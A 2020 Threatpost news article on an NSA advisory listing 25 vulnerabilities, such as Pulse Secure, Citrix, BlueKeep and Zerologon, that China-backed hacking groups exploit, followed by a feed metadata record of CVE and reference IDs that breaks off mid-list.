Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks

2020-10-21T20:31:17

Description

Chinese state-sponsored cyberattackers are actively compromising U.S. targets using a raft of known security vulnerabilities – with a Pulse VPN flaw claiming the dubious title of “most-favored bug” for these groups. That’s according to the National Security Agency (NSA), which released a “top 25” list of the exploits that are used the most by China-linked advanced persistent threats (APT), which include the likes of [Cactus Pete](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>), [TA413,](<https://threatpost.com/chinese-apt-sepulcher-malware-phishing-attacks/158871/>) [Vicious Panda](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>) and [Winniti](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>). The Feds [warned in September](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>) that Chinese threat actors had successfully compromised several government and private sector entities in recent months; the NSA is now driving the point home about the need to patch amid this flurry of heightened activity.[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>) “Many of these vulnerabilities can be used to gain initial access to victim networks by exploiting products that are directly accessible from the internet,” warned the NSA, in its Tuesday [advisory](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/>). “Once a cyber-actor has established a presence on a network from one of these remote exploitation vulnerabilities, they can use other vulnerabilities to further exploit the network from the inside.” APTs – Chinese and otherwise – have ramped up their cyberespionage efforts in the wake of the pandemic as well as in the leadup to the U.S. elections next month. But Chloé Messdaghi, vice president of strategy at Point3 Security, noted that these vulnerabilities contribute to an ongoing swell of attacks. “We definitely saw an increase in this situation last year and it’s ongoing,” she said. “They’re trying to collect intellectual property data. Chinese attackers could be nation-state, could be a company or group of companies, or just a group of threat actors or an individual trying to get proprietary information to utilize and build competitive companies…in other words, to steal and use for their own gain.” ## **Pulse Secure, BlueKeep, Zerologon and More** Plenty of well-known and infamous bugs made the NSA’s Top 25 cut. For instance, a notorious Pulse Secure VPN bug (CVE-2019-11510) is the first flaw on the list. It’s an [arbitrary file-reading flaw](<https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware>) that opens systems to exploitation from remote, unauthenticated attackers. In April of this year, the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) attackers are actively using the issue to steal passwords to infiltrate corporate networks. And in fact, this is the bug at the heart of the [Travelex ransomware fiasco](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) that hit in January. Pulse Secure issued a patch in April 2019, but many companies impacted by the flaw still haven’t applied it, CISA warned. Another biggie for foreign adversaries is a critical flaw in F5 BIG-IP 8 proxy/load balancer devices ([CVE-2020-5902](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>)). This remote code-execution (RCE) bug exists in the Traffic Management User Interface (TMUI) of the device that’s used for configuration. It allows complete control of the host machine upon exploitation, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and serving as a hop-point into other areas of the network. At the end of June, F5 issued urgent patches the bug, which has a CVSS severity score of 10 out of 10 “due to its lack of complexity, ease of attack vector, and high impacts to confidentiality, integrity and availability,” researchers said at the time. Thousands of devices were shown to be vulnerable in a Shodan search in July. The NSA also flagged several vulnerabilities in Citrix as being Chinese faves, including CVE-2019-19781, which was revealed last holiday season. The bug exists in the Citrix Application Delivery Controller (ADC) and Gateway, a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web. An exploit can lead to RCE without credentials. When it was originally disclosed in December, the vulnerability did not have a patch, and Citrix had to [scramble to push fixes out](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) – but not before public proof-of-concept (PoC) exploit code emerged, along with active exploitations and mass scanning activity for the vulnerable Citrix products. Other Citrix bugs in the list include CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196. Meanwhile, Microsoft bugs are well-represented, including the [BlueKeep RCE bug](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) in Remote Desktop Services (RDP), which is still under active attack a year after disclosure. The bug tracked as CVE-2019-0708 can be exploited by an unauthenticated attacker connecting to the target system using RDP, to send specially crafted requests and execute code. The issue with BlueKeep is that researchers believe it to be wormable, which could lead to a WannaCry-level disaster, they have said. Another bug-with-a-name on the list is [Zerologon](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>), the privilege-escalation vulnerability that allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It was patched in August, but many organizations remain vulnerable, and the DHS recently [issued a dire warning](<https://threatpost.com/dire-patch-warning-zerologon/159404/>) on the bug amid a tsunami of attacks. The very first bug ever reported to Microsoft by the NSA, CVE-2020-0601, is also being favored by Chinese actors. This spoofing vulnerability, [patched in January,](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear that the file was from a trusted, legitimate source. Two proof-of-concept (PoC) exploits were publicly released just a week after Microsoft’s January Patch Tuesday security bulletin addressed the flaw. Then there’s a high-profile Microsoft Exchange validation key RCE bug ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)), which stems from the server failing to properly create unique keys at install time. It was fixed as part of Microsoft’s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates – and [admins in March were warned](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that unpatched servers are being exploited in the wild by unnamed APT actors. But as of Sept. 30, at least 61 percent of Exchange 2010, 2013, 2016 and 2019 servers [were still vulnerable](<https://threatpost.com/microsoft-exchange-exploited-flaw/159669/>) to the flaw. ## **The Best of the Rest** The NSA’s Top 25 list covers plenty of ground, including a [nearly ubiquitous RCE bug](<https://threatpost.com/critical-microsoft-rce-bugs-windows/145572/>) (CVE-2019-1040) that, when disclosed last year, affected all versions of Windows. It allows a man-in-the-middle attacker to bypass the NTLM Message Integrity Check protection. Here’s a list of the other flaws: * CVE-2018-4939 in certain Adobe ColdFusion versions. * CVE-2020-2555 in the Oracle Coherence product in Oracle Fusion Middleware. * CVE-2019-3396 in the Widget Connector macro in Atlassian Confluence Server * CVE-2019-11580 in Atlassian Crowd or Crowd Data Center * CVE-2020-10189 in Zoho ManageEngine Desktop Central * CVE-2019-18935 in Progress Telerik UI for ASP.NET AJAX. * CVE-2019-0803 in Windows, a privilege-escalation issue in the Win32k component * CVE-2020-3118 in the Cisco Discovery Protocol implementation for Cisco IOS XR Software * CVE-2020-8515 in DrayTek Vigor devices The advisory also covers three older bugs: One in Exim mail transfer (CVE-2018-6789); one in Symantec Messaging Gateway (CVE-2017-6327); and one in the WLS Security component in Oracle WebLogic Server (CVE-2015-4852). “We hear loud and clear that it can be hard to prioritize patching and mitigation efforts,” NSA Cybersecurity Director Anne Neuberger said in a media statement. “We hope that by highlighting the vulnerabilities that China is actively using to compromise systems, cybersecurity professionals will gain actionable information to prioritize efforts and secure their systems.”

{"id": "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks", "description": "Chinese state-sponsored cyberattackers are actively compromising U.S. targets using a raft of known security vulnerabilities \u2013 with a Pulse VPN flaw claiming the dubious title of \u201cmost-favored bug\u201d for these groups.\n\nThat\u2019s according to the National Security Agency (NSA), which released a \u201ctop 25\u201d list of the exploits that are used the most by China-linked advanced persistent threats (APT), which include the likes of [Cactus Pete](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>), [TA413,](<https://threatpost.com/chinese-apt-sepulcher-malware-phishing-attacks/158871/>) [Vicious Panda](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>) and [Winniti](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>).\n\nThe Feds [warned in September](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>) that Chinese threat actors had successfully compromised several government and private sector entities in recent months; the NSA is now driving the point home about the need to patch amid this flurry of heightened activity.[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cMany of these vulnerabilities can be used to gain initial access to victim networks by exploiting products that are directly accessible from the internet,\u201d warned the NSA, in its Tuesday [advisory](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/>). \u201cOnce a cyber-actor has established a presence on a network from one of these remote exploitation vulnerabilities, they can use other vulnerabilities to further exploit the network from the inside.\u201d\n\nAPTs \u2013 Chinese and otherwise \u2013 have ramped up their cyberespionage efforts in the wake of the pandemic as well as in the leadup to the U.S. elections next month. But Chlo\u00e9 Messdaghi, vice president of strategy at Point3 Security, noted that these vulnerabilities contribute to an ongoing swell of attacks.\n\n\u201cWe definitely saw an increase in this situation last year and it\u2019s ongoing,\u201d she said. \u201cThey\u2019re trying to collect intellectual property data. Chinese attackers could be nation-state, could be a company or group of companies, or just a group of threat actors or an individual trying to get proprietary information to utilize and build competitive companies\u2026in other words, to steal and use for their own gain.\u201d\n\n## **Pulse Secure, BlueKeep, Zerologon and More**\n\nPlenty of well-known and infamous bugs made the NSA\u2019s Top 25 cut. For instance, a notorious Pulse Secure VPN bug (CVE-2019-11510) is the first flaw on the list.\n\nIt\u2019s an [arbitrary file-reading flaw](<https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware>) that opens systems to exploitation from remote, unauthenticated attackers. In April of this year, the Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) attackers are actively using the issue to steal passwords to infiltrate corporate networks. And in fact, this is the bug at the heart of the [Travelex ransomware fiasco](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) that hit in January.\n\nPulse Secure issued a patch in April 2019, but many companies impacted by the flaw still haven\u2019t applied it, CISA warned.\n\nAnother biggie for foreign adversaries is a critical flaw in F5 BIG-IP 8 proxy/load balancer devices ([CVE-2020-5902](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>)). This remote code-execution (RCE) bug exists in the Traffic Management User Interface (TMUI) of the device that\u2019s used for configuration. It allows complete control of the host machine upon exploitation, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and serving as a hop-point into other areas of the network.\n\nAt the end of June, F5 issued urgent patches the bug, which has a CVSS severity score of 10 out of 10 \u201cdue to its lack of complexity, ease of attack vector, and high impacts to confidentiality, integrity and availability,\u201d researchers said at the time. Thousands of devices were shown to be vulnerable in a Shodan search in July.\n\nThe NSA also flagged several vulnerabilities in Citrix as being Chinese faves, including CVE-2019-19781, which was revealed last holiday season. The bug exists in the Citrix Application Delivery Controller (ADC) and Gateway, a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web. An exploit can lead to RCE without credentials.\n\nWhen it was originally disclosed in December, the vulnerability did not have a patch, and Citrix had to [scramble to push fixes out](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) \u2013 but not before public proof-of-concept (PoC) exploit code emerged, along with active exploitations and mass scanning activity for the vulnerable Citrix products.\n\nOther Citrix bugs in the list include CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196.\n\nMeanwhile, Microsoft bugs are well-represented, including the [BlueKeep RCE bug](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) in Remote Desktop Services (RDP), which is still under active attack a year after disclosure. The bug tracked as CVE-2019-0708 can be exploited by an unauthenticated attacker connecting to the target system using RDP, to send specially crafted requests and execute code. The issue with BlueKeep is that researchers believe it to be wormable, which could lead to a WannaCry-level disaster, they have said.\n\nAnother bug-with-a-name on the list is [Zerologon](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>), the privilege-escalation vulnerability that allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It was patched in August, but many organizations remain vulnerable, and the DHS recently [issued a dire warning](<https://threatpost.com/dire-patch-warning-zerologon/159404/>) on the bug amid a tsunami of attacks.\n\nThe very first bug ever reported to Microsoft by the NSA, CVE-2020-0601, is also being favored by Chinese actors. This spoofing vulnerability, [patched in January,](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear that the file was from a trusted, legitimate source.\n\nTwo proof-of-concept (PoC) exploits were publicly released just a week after Microsoft\u2019s January Patch Tuesday security bulletin addressed the flaw.\n\nThen there\u2019s a high-profile Microsoft Exchange validation key RCE bug ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)), which stems from the server failing to properly create unique keys at install time.\n\nIt was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates \u2013 and [admins in March were warned](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that unpatched servers are being exploited in the wild by unnamed APT actors. But as of Sept. 30, at least 61 percent of Exchange 2010, 2013, 2016 and 2019 servers [were still vulnerable](<https://threatpost.com/microsoft-exchange-exploited-flaw/159669/>) to the flaw.\n\n## **The Best of the Rest**\n\nThe NSA\u2019s Top 25 list covers plenty of ground, including a [nearly ubiquitous RCE bug](<https://threatpost.com/critical-microsoft-rce-bugs-windows/145572/>) (CVE-2019-1040) that, when disclosed last year, affected all versions of Windows. It allows a man-in-the-middle attacker to bypass the NTLM Message Integrity Check protection.\n\nHere\u2019s a list of the other flaws:\n\n * CVE-2018-4939 in certain Adobe ColdFusion versions.\n * CVE-2020-2555 in the Oracle Coherence product in Oracle Fusion Middleware.\n * CVE-2019-3396 in the Widget Connector macro in Atlassian Confluence Server\n * CVE-2019-11580 in Atlassian Crowd or Crowd Data Center\n * CVE-2020-10189 in Zoho ManageEngine Desktop Central\n * CVE-2019-18935 in Progress Telerik UI for ASP.NET AJAX.\n * CVE-2019-0803 in Windows, a privilege-escalation issue in the Win32k component\n * CVE-2020-3118 in the Cisco Discovery Protocol implementation for Cisco IOS XR Software\n * CVE-2020-8515 in DrayTek Vigor devices\n\nThe advisory also covers three older bugs: One in Exim mail transfer (CVE-2018-6789); one in Symantec Messaging Gateway (CVE-2017-6327); and one in the WLS Security component in Oracle WebLogic Server (CVE-2015-4852).\n\n\u201cWe hear loud and clear that it can be hard to prioritize patching and mitigation efforts,\u201d NSA Cybersecurity Director Anne Neuberger said in a media statement. \u201cWe hope that by highlighting the vulnerabilities that China is actively using to compromise systems, cybersecurity professionals will gain actionable information to prioritize efforts and secure their systems.\u201d\n", "published": "2020-10-21T20:31:17", "modified": "2020-10-21T20:31:17", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://threatpost.com/bug-nsa-china-backed-cyberattacks/160421/", "reporter": "Tara Seals", "references": ["https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/", "https://threatpost.com/chinese-apt-sepulcher-malware-phishing-attacks/158871/", "https://threatpost.com/coronavirus-apt-attack-malware/153697/", "https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/", "https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/", "https://threatpost.com/newsletter-sign/", "https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/", "https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware", "https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/", "https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/", "https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/", "https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/", "https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/", "https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/", "https://threatpost.com/dire-patch-warning-zerologon/159404/", "https://threatpost.com/microsoft-patches-crypto-bug/151842/", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688", "https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/", "https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/", "https://threatpost.com/microsoft-exchange-exploited-flaw/159669/", "https://threatpost.com/critical-microsoft-rce-bugs-windows/145572/"], "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "immutableFields": [], "lastseen": "2020-10-22T15:51:14", "viewCount": 743, "enchantments": {"dependencies": {"references": [{"type": "0daydb", "idList": ["0DAYDB:137B89027DF0ADFC87056CE176A77441", "0DAYDB:7673EE0281A214ED87D52BA25B8C65BA", "0DAYDB:AF426AEE507511B61499B493AB5C0D11", "0DAYDB:C05243B3F6EF6FD2D281FAA1565DB0D6"]}, {"type": "adobe", "idList": ["APSB18-14"]}, {"type": "amazon", "idList": ["ALAS-2018-970"]}, {"type": "archlinux", "idList": ["ASA-201802-6"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-57971", "ATLASSIAN:CONFSERVER-57974", "ATLASSIAN:CWD-5388", "CONFSERVER-57971", "CONFSERVER-57974", "CWD-5388"]}, {"type": "attackerkb", "idList": ["AKB:03ABAD00-322E-4905-B8D2-E3DA9F049145", "AKB:0C69B33C-2322-4075-BE16-A92593B75107", "AKB:131226A6-A1E9-48A1-A5D0-AC94BAF8DFD2", "AKB:17442CEB-043D-4879-BE5C-FC920511E791", "AKB:1A38FF57-43D7-4AFE-9E56-6A773F2B88AE", "AKB:1EB6A6AA-8081-4030-BC12-58CFD5C47668", "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "AKB:255908B4-BA2B-4575-84E5-63690A0110AE", "AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "AKB:3014CE3B-5D5F-4310-AB9F-3023E9B7126C", "AKB:30E011CE-C422-42D7-BC8C-EFFC7B3B11A3", "AKB:3AC01970-2631-4B37-B354-4040C1A7E983", "AKB:3EC4F6E5-7F60-42EF-9218-009F7538748C", "AKB:43680748-EEC0-4395-9572-2A3534D61D88", "AKB:4501BDF0-F0BC-4E58-ABDB-5A03E74B412F", "AKB:63C1E977-B118-475C-8C47-1046B294E1BA", "AKB:67DD67D3-33BC-455C-98A3-7DD0E1D4613D", "AKB:69741DFD-3169-4113-B9D5-F2D752453CCA", "AKB:71A48C9F-C37B-4C1A-AD30-456EF1B66CF9", "AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:7CB9D781-D42B-49AD-8368-7833414FD76A", "AKB:862DFB64-EE07-4F1F-B5F3-8F2C3A560A5F", "AKB:86915DE7-C5F7-483B-A324-DF5B1929FBF6", "AKB:86F390BB-7946-4223-970A-D493D6DD1E0A", "AKB:90047E82-FDD8-47DB-9552-50D104A34230", "AKB:90DDDBF9-EA58-4470-B821-C35007A64BD6", "AKB:9BE08048-B58F-4ECA-9DF9-EC2241B34B52", "AKB:A4BDBFB9-4493-4EF5-8C05-276721F6549F", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "AKB:B4447AA8-BD5F-410D-A592-76FEEDA507EA", "AKB:B8A2FA01-8796-4335-8BF4-45147E14AFC9", "AKB:B983621D-529B-4375-AA6C-0DB0FBBF9A94", "AKB:BFDD9A54-15E2-4C3F-A140-DA45C72DACDA", "AKB:D432D14A-94A1-4099-B6F6-959B6EF2A545", "AKB:E152B863-E927-4417-BC7B-1472E48FD3A1", "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B", "AKB:E88B8795-0434-4AC5-B3D5-7E3DAB8A60C1", "AKB:ED05D93E-5B20-4B44-BAC8-C4CB5B46254A", "AKB:EF56F4A3-B95C-4CA0-9E19-BA58E1295785", "AKB:F0223615-0DEB-4BCC-8CF7-F9CED07F1876", "AKB:FDF5A3A7-D224-432D-A61A-88CFCB4B9799"]}, {"type": "avleonov", "idList": ["AVLEONOV:4FCA3B316DF1BAA7BC038015245D9813", "AVLEONOV:56C5888A0A7E36482CFC39A438BADAB3", "AVLEONOV:6A714F9BC2BBE696D3586B2629169491", "AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34", "AVLEONOV:C227E6D768CE965E884A2A9208D66579", "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246"]}, {"type": "canvas", "idList": ["BLUEKEEP", "BRIGHTMAIL_RESTORE", "CONFLUENCE_MACRO_LFI", "DDE_CLOSEHANDLE_LPE", "EXIM_HEAP_OVERFLOW", "NETSCALER_TRAVERSAL_RCE", "OWA_RCE", "WEBLOGIC_T3_DESERIALIZATION"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:83C94B14C546544713E49B16CCCBF672", "CARBONBLACK:971FEABEB6DA17E9D4D3137981B2B685", "CARBONBLACK:B2094018923AC88282ED4B94CB24F28B"]}, {"type": "cert", "idList": ["VU:261385", "VU:290915", "VU:576313", "VU:619785", "VU:849224", "VU:927237"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2015-1321", "CPAI-2017-0728", "CPAI-2018-0772", "CPAI-2018-1694", "CPAI-2019-0430", "CPAI-2019-0506", "CPAI-2019-0657", "CPAI-2019-0860", "CPAI-2019-1097", "CPAI-2019-1531", "CPAI-2019-1653", "CPAI-2019-1914", "CPAI-2020-0019", "CPAI-2020-0104", "CPAI-2020-0118", "CPAI-2020-0179", "CPAI-2020-0320", "CPAI-2020-0628", "CPAI-2020-0712"]}, {"type": "checkpoint_security", "idList": ["CPS:SK164716"]}, {"type": "chrome", "idList": ["GCSA-7741258004223335178"]}, {"type": "cisa", "idList": ["CISA:134C272F26FB005321448C648224EB02", "CISA:18E5825084F7681AD375ACB5B1270280", "CISA:3219D2E89DB1680D9EF6F22691FC5829", "CISA:5BA27AECCB94A75E13B4091A8F85AD87", "CISA:661993843C9F9A838ADA8B8B8B9412D1", "CISA:6EE79BF110142CD46F3BD55025F3C4AB", "CISA:81A1472B76D72ABF1AA69524AFD40F34", "CISA:871444F0026579280090F0A0759442B1", "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "CISA:A5265FFF4C417EB767D82231D2D604B8", "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2015-4852", "CISA-KEV-CVE-2017-6327", "CISA-KEV-CVE-2018-4939", "CISA-KEV-CVE-2018-6789", "CISA-KEV-CVE-2019-0708", "CISA-KEV-CVE-2019-0803", "CISA-KEV-CVE-2019-0859", "CISA-KEV-CVE-2019-11510", "CISA-KEV-CVE-2019-11580", "CISA-KEV-CVE-2019-18935", "CISA-KEV-CVE-2019-19781", "CISA-KEV-CVE-2019-3396", "CISA-KEV-CVE-2020-0601", "CISA-KEV-CVE-2020-0688", "CISA-KEV-CVE-2020-10189", "CISA-KEV-CVE-2020-2555", "CISA-KEV-CVE-2020-3118", "CISA-KEV-CVE-2020-5902", "CISA-KEV-CVE-2020-8193", "CISA-KEV-CVE-2020-8195", "CISA-KEV-CVE-2020-8196", "CISA-KEV-CVE-2020-8515"]}, {"type": "cisco", "idList": ["CISCO-SA-20200205-IOSXR-CDP-RCE"]}, {"type": "citrix", "idList": ["CTX267027", "CTX276688"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:7DA761A6C6FF78EAAABBA6C79E29B2BE"]}, {"type": "cve", "idList": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0685", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-0859", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1274-1:2DD70", "DEBIAN:DLA-1274-1:F1418", "DEBIAN:DSA-4110-1:E5F9E", "DEBIAN:DSA-4110-1:E8B3F"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-6789"]}, {"type": "dsquare", "idList": ["E-581", "E-686", "E-688", "E-709"]}, {"type": "exploitdb", "idList": ["EDB-ID:42519", "EDB-ID:44571", "EDB-ID:45671", "EDB-ID:46731", "EDB-ID:46904", "EDB-ID:46920", "EDB-ID:47120", "EDB-ID:47297", "EDB-ID:47416", "EDB-ID:47793", "EDB-ID:47901", "EDB-ID:47902", "EDB-ID:47913", "EDB-ID:47930", "EDB-ID:48153", "EDB-ID:48168", "EDB-ID:48268", "EDB-ID:48320", "EDB-ID:48508", "EDB-ID:48642", "EDB-ID:48643", "EDB-ID:48711", "EDB-ID:49038", "EDB-ID:49465"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:0242F3AC3E43042D33450FE96E439DA3", "EXPLOITPACK:028DB84C4840B8D96405811A4FA47345", "EXPLOITPACK:04BD77915CB7D5152AF289164D21448A", "EXPLOITPACK:1395F02807B421A9A8880862CED5BAB3", "EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "EXPLOITPACK:23F64F82AC4F6039E4EBCB303C604A42", "EXPLOITPACK:4639A09DD9AC0CEB700BE689515D2AE7", "EXPLOITPACK:6EC3063003DFEB019CB57306B1F575D0", "EXPLOITPACK:71F27F0B85E2B8F7A6B9272A3136DA05", "EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF", "EXPLOITPACK:AE2D3F648B410F57DC5F105EDA166E2B", "EXPLOITPACK:C90C58C22E53621B5A2A2AAEBCDF2EBC", "EXPLOITPACK:D0A0C692882848C218FDF1B93258E171", "EXPLOITPACK:D1236C309752040951CA6CF70D1EEE69"]}, {"type": "f5", "idList": ["F5:K25238311", "F5:K30518307", "SOL30518307"]}, {"type": "fedora", "idList": ["FEDORA:3B593605DCC5", "FEDORA:C80A96015189"]}, {"type": "filippoio", "idList": ["FILIPPOIO:A761D20DF072FAFAF24F6BC3A68D6AF9"]}, {"type": "fireeye", "idList": ["FIREEYE:173497473E4F8289490BBFFF8E828EC9", "FIREEYE:27339B4646A838356BA1378430516613", "FIREEYE:2FBC6EAA2BC98E48BDE41A39FB730AA1", "FIREEYE:385EC2DA0B6E50D0AC9113A707F5E623", "FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B", "FIREEYE:B394E05FC4834992E8F05135E3087CAD", "FIREEYE:BFB36D22F20651C632D25AA20588E904", "FIREEYE:E126D2B5A643EE6CD5B128CAC8C217CF"]}, {"type": "freebsd", "idList": ["2BAB995F-36D4-11EA-9DAD-002590ACAE31", "316B3C3E-0E98-11E8-8D41-97657151F8C2"]}, {"type": "gentoo", "idList": ["GLSA-201803-01"]}, {"type": "githubexploit", "idList": ["00B8023B-5D2D-5FF7-9F9E-C773ACF38386", "03237B57-97DA-5A83-B4B2-869C01BC59F7", "05081BAE-6AEB-5206-8BEC-6D067EE4B660", "05283D8D-AE42-54D4-B0CC-85DEBC639859", "059DC199-E425-50EE-B5F5-E351E0323E69", "067A6222-57A8-52E2-887C-CA7ED4D9A4F4", "0829A67E-3C24-5D54-B681-A7F72848F524", "09DFDAA9-9EF6-513F-B464-D707B45D598A", "0A8531EC-3F13-5F4F-84B0-58DB34580167", "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "0DFEFF1E-DC55-5AFB-B968-B09E2E591700", "0F2E8B00-74C7-5BE8-A801-CD92790E4C2E", "0FE94331-DF7E-5791-BE22-DD1DF78E5A3C", "0FF9E057-0D2B-510C-944D-3EDF8DD10956", "10F73C81-91F0-5199-9C8E-432BF228C96A", "1348D3BB-7C57-5B0C-9B6B-EE26F534D536", "1504582F-1A1E-5CA1-A07C-FB05DECB01A9", "152D4F4D-1599-54AE-9A00-A593A379AE0A", "154F9E24-FA6C-529E-8E63-1351432DF6B9", "1741E720-F85A-5179-AB8A-D6FA2E185092", "17650B64-ADED-58F1-9BB3-3E82E1E41A7B", "188C3DB2-3A7F-5EBA-BA09-2075364C0B07", "18DD4D81-26F7-5D44-BAC2-BC6B7D65E198", "190C90D2-4C97-59F5-B1A3-B33DC30ADA82", "19160D73-DC0F-5BE5-85CF-4C7465B538AF", "19F70587-89FB-5855-A578-0E55C3510C59", "1AAD4FCC-D02C-52F0-ADA8-410D1B99297C", "1AB95B23-4916-5338-9CB0-28672888287F", "1F74FB7B-4F6B-51C6-9117-E7A9750D027D", "1FEBEBF0-4E44-56B3-8111-2B2357BDD6B6", "21D540EC-C4D0-5076-92B2-AA746AF7AEE4", 